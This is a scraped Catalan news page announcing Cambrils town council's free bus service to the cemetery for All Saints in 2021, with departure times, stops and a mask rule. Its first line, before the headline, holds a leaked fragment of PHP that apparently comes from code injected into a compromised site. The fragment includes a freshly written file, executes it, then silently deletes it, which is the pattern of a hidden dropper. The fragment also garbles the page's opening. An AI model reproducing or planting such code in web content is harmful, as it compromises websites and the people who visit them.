");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L’Ajuntament de Cambrils ofereix un servei gratuït d’autobús al cementiri per Tots Sants
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L’Ajuntament de Cambrils ofereix un servei gratuït d’autobús al cementiri per Tots Sants (19/10/2021)

L’Ajuntament de Cambrils oferirà el servei especial d’autobús gratuït per anar al cementiri els dies 31 d’octubre i 1 de novembre amb motiu de la festa tradicional de Tots Sants. L’autobús urbà farà quatre viatges diaris d’anada i tornada, tres de matí i un de tarda, per facilitar el desplaçament a les persones que vulguin anar a recordar els seus difunts. Els horaris i el mapa del recorregut del bus llançadora es poden descarregar des del web d’Aparcam www.cambrils.cat/aparcam.

Les expedicions, que connectaran la zona central del municipi amb el cementiri, sortiran del Casal de la Gent Gran a les 9:30, 10:30, 11:30 i 15:30 hores i arribaran al cementiri 17 minuts més tard amb parades a l’Estació de Bus, Jaume I, Creu de la Missió, Adelaida, passeig Albert i Carles Roig. Les expedicions de tornada es faran a les 11, les 12, les 13 i les 17 hores i el recorregut finalitzarà a Creu de la Missió amb parades a Carles Roig, Passeig Albert, Casal, Estació de Bus i Jaume I. Per accedir al bus serà necessari l’ús de la mascareta en tot moment.

Font: Ajuntament de Cambrils

L’Ajuntament de Cambrils ofereix un servei gratuït d’autobús al cementiri per Tots Sants

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona